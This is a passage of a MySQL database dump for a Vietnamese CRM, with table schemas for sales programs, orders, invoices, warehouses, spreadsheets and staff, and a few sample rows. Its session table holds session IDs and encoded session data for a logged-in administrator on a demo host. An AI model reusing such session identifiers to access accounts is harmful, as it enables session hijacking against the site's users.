  `created_by` int(11) DEFAULT NULL,
  `created_at` datetime DEFAULT NULL,
  `descriptions` text DEFAULT NULL,
  `active` int(11) DEFAULT NULL,
  `agent` text DEFAULT NULL,
  `agent_group` text DEFAULT NULL,
  `product` text DEFAULT NULL,
  `product_group` text DEFAULT NULL,
  `discount_type` varchar(20) DEFAULT NULL,
  `agent_group_can_view` text DEFAULT NULL,
  `agent_can_view` text DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

--
-- Dumping data for table `tblsa_programs`
--

INSERT INTO `tblsa_programs` (`id`, `name`, `from_date`, `to_date`, `indefinite`, `created_by`, `created_at`, `descriptions`, `active`, `agent`, `agent_group`, `product`, `product_group`, `discount_type`, `agent_group_can_view`, `agent_can_view`) VALUES
(1, 'Commision - Sale Summe', '2023-05-13', '2023-12-31', 0, 1, '2023-05-13 11:19:55', 'Push Sale - Tổ chức đào tạo WIT', NULL, NULL, NULL, NULL, NULL, 'percentage', NULL, NULL);

-- --------------------------------------------------------

--
-- Table structure for table `tblsa_program_detail`
--

CREATE TABLE `tblsa_program_detail` (
  `id` int(11) NOT NULL,
  `from_amount` int(11) DEFAULT NULL,
  `to_amount` int(11) DEFAULT NULL,
  `discount` decimal(15,2) DEFAULT NULL,
  `program_id` int(11) DEFAULT NULL,
  `product_group` text DEFAULT NULL,
  `product` text DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

--
-- Dumping data for table `tblsa_program_detail`
--

INSERT INTO `tblsa_program_detail` (`id`, `from_amount`, `to_amount`, `discount`, `program_id`, `product_group`, `product`) VALUES
(1, 50000000, 200000000, 3.00, 1, '1,2,3,4,5', NULL);

-- --------------------------------------------------------

--
-- Table structure for table `tblsa_pur_orders`
--

CREATE TABLE `tblsa_pur_orders` (
  `id` int(11) NOT NULL,
  `order_name` varchar(255) NOT NULL,
  `agent_id` int(11) DEFAULT NULL,
  `order_number` varchar(100) NOT NULL,
  `order_date` date DEFAULT NULL,
  `status` int(11) DEFAULT NULL,
  `approve_status` int(11) DEFAULT NULL,
  `datecreated` datetime DEFAULT NULL,
  `delivery_date` date DEFAULT NULL,
  `subtotal` decimal(15,2) DEFAULT NULL,
  `total_tax` decimal(15,2) DEFAULT NULL,
  `total` decimal(15,2) DEFAULT NULL,
  `addedfrom` int(11) DEFAULT NULL,
  `vendornote` text DEFAULT NULL,
  `terms` text DEFAULT NULL,
  `discount_percent` decimal(15,2) DEFAULT NULL,
  `discount_total` decimal(15,2) DEFAULT NULL,
  `discount_type` decimal(15,2) DEFAULT NULL,
  `buyer` int(11) DEFAULT NULL,
  `number` int(11) DEFAULT NULL,
  `hash` varchar(32) DEFAULT NULL,
  `delivery_status` int(11) DEFAULT NULL,
  `type` varchar(30) DEFAULT NULL,
  `currency` int(11) DEFAULT NULL,
  `order_status` varchar(30) DEFAULT NULL,
  `shipping_note` text DEFAULT NULL,
  `currency_rate` decimal(15,6) DEFAULT NULL,
  `from_currency` varchar(20) DEFAULT NULL,
  `to_currency` varchar(20) DEFAULT NULL,
  `shipping_fee` decimal(15,2) DEFAULT NULL,
  `invoice_id` int(11) DEFAULT NULL,
  `stock_export_id` int(11) DEFAULT 0,
  `status_goods` int(11) NOT NULL DEFAULT 0
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblsa_pur_order_detail`
--

CREATE TABLE `tblsa_pur_order_detail` (
  `id` int(11) NOT NULL,
  `pur_order` int(11) NOT NULL,
  `item_code` varchar(100) NOT NULL,
  `description` text DEFAULT NULL,
  `unit_id` int(11) DEFAULT NULL,
  `unit_price` decimal(15,2) DEFAULT NULL,
  `quantity` decimal(15,2) NOT NULL,
  `into_money` decimal(15,2) DEFAULT NULL,
  `tax` text DEFAULT NULL,
  `total` decimal(15,2) DEFAULT NULL,
  `discount_%` decimal(15,2) DEFAULT NULL,
  `discount_money` decimal(15,2) DEFAULT NULL,
  `total_money` decimal(15,2) DEFAULT NULL,
  `tax_value` decimal(15,2) DEFAULT NULL,
  `tax_rate` text DEFAULT NULL,
  `tax_name` text DEFAULT NULL,
  `item_name` text DEFAULT NULL,
  `program_id` text DEFAULT NULL,
  `wh_quantity_received` text DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblsa_sale_invoices`
--

CREATE TABLE `tblsa_sale_invoices` (
  `id` int(11) NOT NULL,
  `agent_id` int(11) NOT NULL,
  `inv_number` text NOT NULL,
  `sent` tinyint(1) NOT NULL DEFAULT 0,
  `datesend` datetime DEFAULT NULL,
  `clientid` int(11) NOT NULL,
  `deleted_customer_name` text DEFAULT NULL,
  `number` int(11) NOT NULL,
  `prefix` text DEFAULT NULL,
  `number_format` int(11) NOT NULL DEFAULT 0,
  `datecreated` datetime NOT NULL,
  `date` date NOT NULL,
  `duedate` date DEFAULT NULL,
  `currency` int(11) NOT NULL,
  `subtotal` decimal(15,2) NOT NULL,
  `total_tax` decimal(15,2) NOT NULL DEFAULT 0.00,
  `total` decimal(15,2) NOT NULL,
  `adjustment` decimal(15,2) DEFAULT NULL,
  `addedfrom` int(11) DEFAULT NULL,
  `hash` text NOT NULL,
  `status` text DEFAULT NULL,
  `clientnote` text DEFAULT NULL,
  `adminnote` text DEFAULT NULL,
  `last_overdue_reminder` date DEFAULT NULL,
  `last_due_reminder` date DEFAULT NULL,
  `cancel_overdue_reminders` int(11) NOT NULL DEFAULT 0,
  `allowed_payment_modes` mediumtext DEFAULT NULL,
  `token` mediumtext DEFAULT NULL,
  `discount_percent` decimal(15,2) DEFAULT 0.00,
  `discount_total` decimal(15,2) DEFAULT 0.00,
  `discount_type` text NOT NULL,
  `recurring` int(11) NOT NULL DEFAULT 0,
  `recurring_type` text DEFAULT NULL,
  `custom_recurring` tinyint(1) NOT NULL DEFAULT 0,
  `cycles` int(11) NOT NULL DEFAULT 0,
  `total_cycles` int(11) NOT NULL DEFAULT 0,
  `is_recurring_from` int(11) DEFAULT NULL,
  `last_recurring_date` date DEFAULT NULL,
  `terms` text DEFAULT NULL,
  `seller` int(11) NOT NULL DEFAULT 0,
  `billing_street` text DEFAULT NULL,
  `billing_city` text DEFAULT NULL,
  `billing_state` text DEFAULT NULL,
  `billing_zip` text DEFAULT NULL,
  `billing_country` int(11) DEFAULT NULL,
  `shipping_street` text DEFAULT NULL,
  `shipping_city` text DEFAULT NULL,
  `shipping_state` text DEFAULT NULL,
  `shipping_zip` text DEFAULT NULL,
  `shipping_country` int(11) DEFAULT NULL,
  `include_shipping` tinyint(1) DEFAULT NULL,
  `show_shipping_on_invoice` tinyint(1) NOT NULL DEFAULT 1,
  `show_quantity_as` int(11) NOT NULL DEFAULT 1,
  `short_link` text DEFAULT NULL,
  `shipping_fee` decimal(15,2) DEFAULT 0.00,
  `currency_rate` decimal(15,6) DEFAULT NULL,
  `from_currency` varchar(20) DEFAULT NULL,
  `to_currency` varchar(20) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblsa_sale_invoice_details`
--

CREATE TABLE `tblsa_sale_invoice_details` (
  `id` int(11) NOT NULL,
  `sale_invoice` int(11) NOT NULL,
  `item_code` varchar(100) DEFAULT NULL,
  `description` text DEFAULT NULL,
  `unit_id` int(11) DEFAULT NULL,
  `unit_price` decimal(15,2) DEFAULT NULL,
  `quantity` decimal(15,2) DEFAULT NULL,
  `into_money` decimal(15,2) DEFAULT NULL,
  `tax` text DEFAULT NULL,
  `total` decimal(15,2) DEFAULT NULL,
  `discount_percent` decimal(15,2) DEFAULT NULL,
  `discount_money` decimal(15,2) DEFAULT NULL,
  `total_money` decimal(15,2) DEFAULT NULL,
  `tax_value` decimal(15,2) DEFAULT NULL,
  `tax_rate` text DEFAULT NULL,
  `tax_name` text DEFAULT NULL,
  `item_name` text DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblsa_sale_invoice_payment`
--

CREATE TABLE `tblsa_sale_invoice_payment` (
  `id` int(10) UNSIGNED NOT NULL,
  `sale_invoice` int(11) NOT NULL,
  `amount` decimal(15,2) NOT NULL,
  `paymentmode` longtext DEFAULT NULL,
  `date` date NOT NULL,
  `daterecorded` datetime NOT NULL,
  `note` text NOT NULL,
  `transactionid` mediumtext DEFAULT NULL,
  `requester` int(11) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblsa_warehouse`
--

CREATE TABLE `tblsa_warehouse` (
  `warehouse_id` int(10) UNSIGNED NOT NULL,
  `warehouse_code` text DEFAULT NULL,
  `warehouse_name` text DEFAULT NULL,
  `warehouse_address` text DEFAULT NULL,
  `order` int(11) DEFAULT NULL,
  `display` int(11) DEFAULT NULL COMMENT 'display 1: display (yes)  0: not displayed (no)',
  `note` text DEFAULT NULL,
  `agent_id` int(11) DEFAULT NULL,
  `city` text DEFAULT NULL,
  `state` text DEFAULT NULL,
  `zip_code` text DEFAULT NULL,
  `country` text DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblscheduled_emails`
--

CREATE TABLE `tblscheduled_emails` (
  `id` int(11) NOT NULL,
  `rel_id` int(11) NOT NULL,
  `rel_type` varchar(15) NOT NULL,
  `scheduled_at` datetime NOT NULL,
  `contacts` varchar(197) NOT NULL,
  `cc` text DEFAULT NULL,
  `attach_pdf` tinyint(1) NOT NULL DEFAULT 1,
  `template` varchar(197) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblservices`
--

CREATE TABLE `tblservices` (
  `serviceid` int(11) NOT NULL,
  `name` varchar(50) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblservices`
--

INSERT INTO `tblservices` (`serviceid`, `name`) VALUES
(1, 'Yêu cầu báo giá dự toán'),
(2, 'Yêu cầu Bảo Hành Bảo Dưỡng'),
(3, 'Yêu cầu bảo dưỡng quạt'),
(4, 'Yêu cầu khảo sát - tư vấn');

-- --------------------------------------------------------

--
-- Table structure for table `tblsessions`
--

CREATE TABLE `tblsessions` (
  `id` varchar(128) NOT NULL,
  `ip_address` varchar(45) NOT NULL,
  `timestamp` int(10) UNSIGNED NOT NULL DEFAULT 0,
  `data` blob NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblsessions`
--

INSERT INTO `tblsessions` (`id`, `ip_address`, `timestamp`, `data`) VALUES
('2oqbqahhb69g88fj8gmivs3icgveqpp7', '127.0.0.1', 1718203205, 0x5f5f63695f6c6173745f726567656e65726174657c693a313731383230333230353b5f707265765f75726c7c733a36383a2268747470733a2f2f7769742d63726d2e64656d6f2e7a696e69736f66742e6e65742f61646d696e2f616e6e6f756e63656d656e74732f616e6e6f756e63656d656e742f31223b73746166665f757365725f69647c733a313a2231223b73746166665f6c6f676765645f696e7c623a313b73657475702d6d656e752d6f70656e7c733a303a22223b657374696d6174655f706970656c696e657c733a343a2274727565223b),
('440oqd01t8b0cud5uc0mrfum6oqj033f', '127.0.0.1', 1718202557, 0x5f5f63695f6c6173745f726567656e65726174657c693a313731383230323535373b5f707265765f75726c7c733a37323a2268747470733a2f2f7769742d63726d2e64656d6f2e7a696e69736f66742e6e65742f61646d696e2f73657474696e67733f67726f75703d706466267461623d7369676e6174757265223b73746166665f757365725f69647c733a313a2231223b73746166665f6c6f676765645f696e7c623a313b73657475702d6d656e752d6f70656e7c623a313b657374696d6174655f706970656c696e657c733a343a2274727565223b),
('4n30t8i1s6cojmmlh2aeqkcg9tdl86dv', '127.0.0.1', 1718187049, 0x5f5f63695f6c6173745f726567656e65726174657c693a313731383138373034393b5f707265765f75726c7c733a34383a2268747470733a2f2f7769742d63726d2e64656d6f2e7a696e69736f66742e6e65742f61646d696e2f73657474696e6773223b73746166665f757365725f69647c733a313a2231223b73746166665f6c6f676765645f696e7c623a313b73657475702d6d656e752d6f70656e7c623a313b657374696d6174655f706970656c696e657c733a343a2274727565223b),
('4u6s99di5fqp8g1b2bk540rp8caktobn', '127.0.0.1', 1718186129, 0x5f5f63695f6c6173745f726567656e65726174657c693a313731383138363132393b5f707265765f75726c7c733a34383a2268747470733a2f2f7769742d63726d2e64656d6f2e7a696e69736f66742e6e65742f61646d696e2f696e766f69636573223b73746166665f757365725f69647c733a313a2231223b73746166665f6c6f676765645f696e7c623a313b73657475702d6d656e752d6f70656e7c733a303a22223b657374696d6174655f706970656c696e657c733a343a2274727565223b),
('84939m7ikkft0v7ierroen8ct819pdqc', '127.0.0.1', 1718193473, 0x5f5f63695f6c6173745f726567656e65726174657c693a313731383139333437333b5f707265765f75726c7c733a36353a2268747470733a2f2f7769742d63726d2e64656d6f2e7a696e69736f66742e6e65742f61646d696e2f73707265616473686565745f6f6e6c696e652f6d616e616765223b73746166665f757365725f69647c733a313a2231223b73746166665f6c6f676765645f696e7c623a313b73657475702d6d656e752d6f70656e7c733a303a22223b657374696d6174655f706970656c696e657c733a343a2274727565223b),
('9nvbdn3ucgtiu7oea4646dqaf7lrn035', '127.0.0.1', 1718183708, 0x5f5f63695f6c6173745f726567656e65726174657c693a313731383138333730383b5f707265765f75726c7c733a35343a2268747470733a2f2f7769742d63726d2e64656d6f2e7a696e69736f66742e6e65742f61646d696e2f61757468656e7469636174696f6e223b),
('ah98gug2jgn5iaq4107cofmj7j6b9mg4', '127.0.0.1', 1718184022, 0x5f5f63695f6c6173745f726567656e65726174657c693a313731383138343032323b5f707265765f75726c7c733a35343a2268747470733a2f2f7769742d63726d2e64656d6f2e7a696e69736f66742e6e65742f61646d696e2f61757468656e7469636174696f6e223b),
('bfut647uiqn0rt33rue7m2ued6mims5j', '127.0.0.1', 1718184422, 0x5f5f63695f6c6173745f726567656e65726174657c693a313731383138343432323b5f707265765f75726c7c733a35343a2268747470733a2f2f7769742d63726d2e64656d6f2e7a696e69736f66742e6e65742f61646d696e2f73746166662f6d656d6265722f31223b73746166665f757365725f69647c733a313a2231223b73746166665f6c6f676765645f696e7c623a313b73657475702d6d656e752d6f70656e7c623a313b),
('c2t18t68e1s8e8tthf67culfblgpbcqa', '127.0.0.1', 1718202861, 0x5f5f63695f6c6173745f726567656e65726174657c693a313731383230323836313b5f707265765f75726c7c733a35343a2268747470733a2f2f7769742d63726d2e64656d6f2e7a696e69736f66742e6e65742f61646d696e2f636c69656e74732f67726f757073223b73746166665f757365725f69647c733a313a2231223b73746166665f6c6f676765645f696e7c623a313b73657475702d6d656e752d6f70656e7c623a313b657374696d6174655f706970656c696e657c733a343a2274727565223b),
('didppka5dad9p6iahldarmspdfs55eap', '127.0.0.1', 1718184757, 0x5f5f63695f6c6173745f726567656e65726174657c693a313731383138343735373b5f707265765f75726c7c733a36313a2268747470733a2f2f7769742d63726d2e64656d6f2e7a696e69736f66742e6e65742f61646d696e2f73657474696e67733f67726f75703d655f7369676e223b73746166665f757365725f69647c733a313a2231223b73746166665f6c6f676765645f696e7c623a313b73657475702d6d656e752d6f70656e7c623a313b),
('fvrl0vk4tj6oost9plojkc374thn8o0g', '127.0.0.1', 1718186745, 0x5f5f63695f6c6173745f726567656e65726174657c693a313731383138363734353b5f707265765f75726c7c733a35323a2268747470733a2f2f7769742d63726d2e64656d6f2e7a696e69736f66742e6e65742f61646d696e2f6372656469745f6e6f746573223b73746166665f757365725f69647c733a313a2231223b73746166665f6c6f676765645f696e7c623a313b73657475702d6d656e752d6f70656e7c733a303a22223b657374696d6174655f706970656c696e657c733a343a2274727565223b),
('ich47l22694ajlr269n9jngq7nt41hbr', '127.0.0.1', 1718187887, 0x5f5f63695f6c6173745f726567656e65726174657c693a313731383138373838373b5f707265765f75726c7c733a35353a2268747470733a2f2f7769742d63726d2e64656d6f2e7a696e69736f66742e6e65742f61646d696e2f7469636b6574732f696e6465782f35223b73746166665f757365725f69647c733a313a2231223b73746166665f6c6f676765645f696e7c623a313b73657475702d6d656e752d6f70656e7c733a303a22223b657374696d6174655f706970656c696e657c733a343a2274727565223b),
('kgmrbds11tk14m134nk6jhafp2hc8jmq', '127.0.0.1', 1718203205, 0x5f5f63695f6c6173745f726567656e65726174657c693a313731383230333230353b5f707265765f75726c7c733a36303a2268747470733a2f2f7769742d63726d2e64656d6f2e7a696e69736f66742e6e65742f61646d696e2f616e6e6f756e63656d656e74732f766965772f31223b73746166665f757365725f69647c733a313a2231223b73746166665f6c6f676765645f696e7c623a313b73657475702d6d656e752d6f70656e7c733a303a22223b657374696d6174655f706970656c696e657c733a343a2274727565223b6d6573736167652d737563636573737c733a33383a2243e1baad70206e68e1baad74207468c3a06e682063c3b46e67205468c3b46e672062c3a16f2e223b5f5f63695f766172737c613a313a7b733a31353a226d6573736167652d73756363657373223b733a333a226f6c64223b7d),
('opcjubk1h731i110safo277k30edf9ft', '127.0.0.1', 1718185766, 0x5f5f63695f6c6173745f726567656e65726174657c693a313731383138353736363b5f707265765f75726c7c733a34353a2268747470733a2f2f7769742d63726d2e64656d6f2e7a696e69736f66742e6e65742f61646d696e2f7374616666223b73746166665f757365725f69647c733a313a2231223b73746166665f6c6f676765645f696e7c623a313b73657475702d6d656e752d6f70656e7c733a303a22223b657374696d6174655f706970656c696e657c733a343a2274727565223b),
('r8s2kd158tpnu3fg9tmd29a5g4hhu63b', '127.0.0.1', 1718187548, 0x5f5f63695f6c6173745f726567656e65726174657c693a313731383138373534383b5f707265765f75726c7c733a34353a2268747470733a2f2f7769742d63726d2e64656d6f2e7a696e69736f66742e6e65742f61646d696e2f6c65616473223b73746166665f757365725f69647c733a313a2231223b73746166665f6c6f676765645f696e7c623a313b73657475702d6d656e752d6f70656e7c733a303a22223b657374696d6174655f706970656c696e657c733a343a2274727565223b),
('s7d7hcde0fqgdpg6k0k0eni76v1lgai2', '127.0.0.1', 1718185416, 0x5f5f63695f6c6173745f726567656e65726174657c693a313731383138353431363b5f707265765f75726c7c733a34373a2268747470733a2f2f7769742d63726d2e64656d6f2e7a696e69736f66742e6e65742f61646d696e2f636c69656e7473223b73746166665f757365725f69647c733a313a2231223b73746166665f6c6f676765645f696e7c623a313b73657475702d6d656e752d6f70656e7c733a303a22223b657374696d6174655f706970656c696e657c733a343a2274727565223b6d6573736167652d737563636573737c733a33393a2254e1bb956e672073e1bb91206b68c3a163682068c3a06e6720c491c3a32078c3b3613a20363533223b5f5f63695f766172737c613a313a7b733a31353a226d6573736167652d73756363657373223b733a333a226e6577223b7d),
('u6sfoch7vaaoqgv3brul199dt0mnsf7o', '127.0.0.1', 1718185069, 0x5f5f63695f6c6173745f726567656e65726174657c693a313731383138353036393b5f707265765f75726c7c733a34353a2268747470733a2f2f7769742d63726d2e64656d6f2e7a696e69736f66742e6e65742f61646d696e2f7461736b73223b73746166665f757365725f69647c733a313a2231223b73746166665f6c6f676765645f696e7c623a313b73657475702d6d656e752d6f70656e7c733a303a22223b657374696d6174655f706970656c696e657c733a343a2274727565223b6d6573736167652d737563636573737c733a33373a2254e1bb956e672073e1bb91207068c3a26e2063c3b46e6720c491c3a32078c3b3613a203235223b5f5f63695f766172737c613a313a7b733a31353a226d6573736167652d73756363657373223b733a333a226e6577223b7d),
('up2fgqbq3ao4j42s19lpkgdl2psjs7g7', '127.0.0.1', 1718202028, 0x5f5f63695f6c6173745f726567656e65726174657c693a313731383230323032383b5f707265765f75726c7c733a37343a2268747470733a2f2f7769742d63726d2e64656d6f2e7a696e69736f66742e6e65742f61646d696e2f636c69656e74732f636c69656e742f313434393f67726f75703d657870656e736573223b73746166665f757365725f69647c733a313a2231223b73746166665f6c6f676765645f696e7c623a313b73657475702d6d656e752d6f70656e7c733a303a22223b657374696d6174655f706970656c696e657c733a343a2274727565223b),
('vdfogf2jdl6e13orfv1vjqdo04touoil', '127.0.0.1', 1718186440, 0x5f5f63695f6c6173745f726567656e65726174657c693a313731383138363434303b5f707265765f75726c7c733a35333a2268747470733a2f2f7769742d63726d2e64656d6f2e7a696e69736f66742e6e65742f61646d696e2f696e766f6963655f6974656d73223b73746166665f757365725f69647c733a313a2231223b73746166665f6c6f676765645f696e7c623a313b73657475702d6d656e752d6f70656e7c733a303a22223b657374696d6174655f706970656c696e657c733a343a2274727565223b6d6573736167652d737563636573737c733a33373a2254e1bb956e672073e1bb91206de1bba56320c491c3a32062e1bb8b2078c3b3613a20313932223b5f5f63695f766172737c613a313a7b733a31353a226d6573736167652d73756363657373223b733a333a226e6577223b7d);

-- --------------------------------------------------------

--
-- Table structure for table `tblshared_customer_files`
--

CREATE TABLE `tblshared_customer_files` (
  `file_id` int(11) NOT NULL,
  `contact_id` int(11) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblspam_filters`
--

CREATE TABLE `tblspam_filters` (
  `id` int(11) NOT NULL,
  `type` varchar(40) NOT NULL,
  `rel_type` varchar(10) NOT NULL,
  `value` text NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblspam_filters`
--

INSERT INTO `tblspam_filters` (`id`, `type`, `rel_type`, `value`) VALUES
(2, 'phrase', 'tickets', 'láo, mẹ, moá, đù, ');

-- --------------------------------------------------------

--
-- Table structure for table `tblspreadsheet_online_hash_share`
--

CREATE TABLE `tblspreadsheet_online_hash_share` (
  `id` int(10) UNSIGNED NOT NULL,
  `rel_type` varchar(20) NOT NULL,
  `rel_id` int(11) NOT NULL,
  `id_share` int(11) NOT NULL,
  `hash` text DEFAULT NULL,
  `inserted_at` datetime NOT NULL DEFAULT current_timestamp(),
  `updated_at` datetime NOT NULL DEFAULT current_timestamp(),
  `role` int(11) NOT NULL DEFAULT 1
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblspreadsheet_online_my_folder`
--

CREATE TABLE `tblspreadsheet_online_my_folder` (
  `id` int(10) UNSIGNED NOT NULL,
  `parent_id` text NOT NULL,
  `name` text NOT NULL,
  `type` varchar(20) DEFAULT NULL,
  `size` text DEFAULT NULL,
  `staffid` int(11) NOT NULL,
  `category` varchar(20) NOT NULL DEFAULT 'my_folder',
  `inserted_at` datetime NOT NULL DEFAULT current_timestamp(),
  `updated_at` datetime NOT NULL DEFAULT current_timestamp(),
  `data_form` longtext DEFAULT NULL,
  `staffs_share` text DEFAULT NULL,
  `departments_share` text DEFAULT NULL,
  `clients_share` text DEFAULT NULL,
  `client_groups_share` text DEFAULT NULL,
  `rel_type` varchar(100) DEFAULT NULL,
  `rel_id` varchar(11) DEFAULT NULL,
  `group_share_staff` varchar(1) DEFAULT NULL,
  `group_share_client` varchar(1) DEFAULT NULL,
  `realpath_data` varchar(250) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblspreadsheet_online_my_folder`
--

INSERT INTO `tblspreadsheet_online_my_folder` (`id`, `parent_id`, `name`, `type`, `size`, `staffid`, `category`, `inserted_at`, `updated_at`, `data_form`, `staffs_share`, `departments_share`, `clients_share`, `client_groups_share`, `rel_type`, `rel_id`, `group_share_staff`, `group_share_client`, `realpath_data`) VALUES
(1, '1', 'Tổng hợp báo giá', 'folder', '--', 1, 'my_folder', '2022-11-14 14:31:20', '2022-11-14 14:31:20', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(2, '2', 'Mẫu-Báo Giá (dành cho Dự Án)', 'folder', '--', 1, 'my_folder', '2022-11-14 14:35:25', '2022-11-14 14:35:25', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(3, '3', 'Mẫu-Báo Giá (dành cho Bán Lẻ)', 'folder', '--', 1, 'my_folder', '2022-11-14 14:35:40', '2022-11-14 14:35:40', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(4, '4', 'Giá bán lẻ đề xuất (MSRP)', 'folder', '--', 1, 'my_folder', '2022-11-14 14:36:48', '2022-11-14 14:36:48', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(5, '5', 'Quote-2022', 'folder', '--', 1, 'my_folder', '2022-11-14 14:42:54', '2022-11-14 14:42:54', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(7, '2', 'Arp_2022_PF8_24Ft.xlsx', 'file', '--', 1, 'my_folder', '2022-11-15 01:23:02', '2022-11-15 01:23:02', '', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, '/spreadsheet_online/7-Arp_2022_PF8_24Ft.xlsx.txt'),
(8, '2', 'Arp_2022_PF8_24Ft.xlsx', 'file', '--', 1, 'my_folder', '2022-11-15 01:23:08', '2022-11-15 01:23:08', '', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, '/spreadsheet_online/8-Arp_2022_PF8_24Ft.xlsx.txt'),
(9, '2', 'Arp_2022_PF8_24Ft.xlsx', 'file', '--', 1, 'my_folder', '2022-11-15 01:23:08', '2022-11-15 01:23:08', '', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, '/spreadsheet_online/9-Arp_2022_PF8_24Ft.xlsx.txt'),
(11, '11', 'Đề xuất Mẫu cho dự án', 'folder', '--', 1, 'my_folder', '2022-11-15 01:56:43', '2022-11-15 01:56:43', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(19, '5', 'Haiku_I_Series.xlsx', 'file', '--', 1, 'my_folder', '2022-11-16 05:05:43', '2022-11-16 05:05:43', '', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, '/spreadsheet_online/19-Haiku_I_Series.xlsx.txt');

-- --------------------------------------------------------

--
-- Table structure for table `tblspreadsheet_online_related`
--

CREATE TABLE `tblspreadsheet_online_related` (
  `id` int(10) UNSIGNED NOT NULL,
  `parent_id` int(11) NOT NULL,
  `rel_type` varchar(20) NOT NULL,
  `rel_id` int(11) NOT NULL,
  `inserted_at` datetime NOT NULL DEFAULT current_timestamp(),
  `updated_at` datetime NOT NULL DEFAULT current_timestamp(),
  `hash` varchar(250) NOT NULL DEFAULT '',
  `role` int(11) NOT NULL DEFAULT 1
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblstaff`
--

CREATE TABLE `tblstaff` (
  `staffid` int(11) NOT NULL,
  `email` varchar(100) NOT NULL,
  `firstname` varchar(50) NOT NULL,
  `lastname` varchar(50) NOT NULL,
  `facebook` mediumtext DEFAULT NULL,
  `linkedin` mediumtext DEFAULT NULL,
  `phonenumber` varchar(30) DEFAULT NULL,
  `skype` varchar(50) DEFAULT NULL,
  `password` varchar(250) NOT NULL,
  `datecreated` datetime NOT NULL,
  `profile_image` varchar(191) DEFAULT NULL,
  `last_ip` varchar(40) DEFAULT NULL,
  `last_login` datetime DEFAULT NULL,
  `last_activity` datetime DEFAULT NULL,
  `last_password_change` datetime DEFAULT NULL,
  `new_pass_key` varchar(32) DEFAULT NULL,
  `new_pass_key_requested` datetime DEFAULT NULL,
  `admin` int(11) NOT NULL DEFAULT 0,
  `role` int(11) DEFAULT NULL,
  `active` int(11) NOT NULL DEFAULT 1,
  `default_language` varchar(40) DEFAULT NULL,
  `direction` varchar(3) DEFAULT NULL,
  `media_path_slug` varchar(191) DEFAULT NULL,
  `is_not_staff` int(11) NOT NULL DEFAULT 0,
  `hourly_rate` decimal(15,2) NOT NULL DEFAULT 0.00,
  `two_factor_auth_enabled` tinyint(1) DEFAULT 0,
  `two_factor_auth_code` varchar(100) DEFAULT NULL,
  `two_factor_auth_code_requested` datetime DEFAULT NULL,
  `email_signature` text DEFAULT NULL,
  `birthday` date DEFAULT NULL,
  `birthplace` varchar(200) DEFAULT NULL,
  `sex` varchar(15) DEFAULT NULL,
  `marital_status` varchar(25) DEFAULT NULL,
  `nation` varchar(25) DEFAULT NULL,
  `religion` varchar(50) DEFAULT NULL,
  `identification` varchar(100) DEFAULT NULL,
  `days_for_identity` date DEFAULT NULL,
  `home_town` varchar(200) DEFAULT NULL,
  `resident` varchar(200) DEFAULT NULL,
  `current_address` varchar(200) DEFAULT NULL,
  `literacy` varchar(50) DEFAULT NULL,
  `orther_infor` text DEFAULT NULL,
  `job_position` int(11) DEFAULT NULL,
  `workplace` int(11) DEFAULT NULL,
  `place_of_issue` varchar(50) DEFAULT NULL,
  `account_number` varchar(50) DEFAULT NULL,
  `name_account` varchar(50) DEFAULT NULL,
  `issue_bank` varchar(200) DEFAULT NULL,
  `records_received` longtext DEFAULT NULL,
  `Personal_tax_code` varchar(50) DEFAULT NULL,
  `google_auth_secret` text DEFAULT NULL,
  `team_manage` int(11) DEFAULT 0,
  `staff_identifi` varchar(25) DEFAULT NULL,
  `status_work` varchar(100) DEFAULT NULL,
  `date_update` date DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblstaff`
--

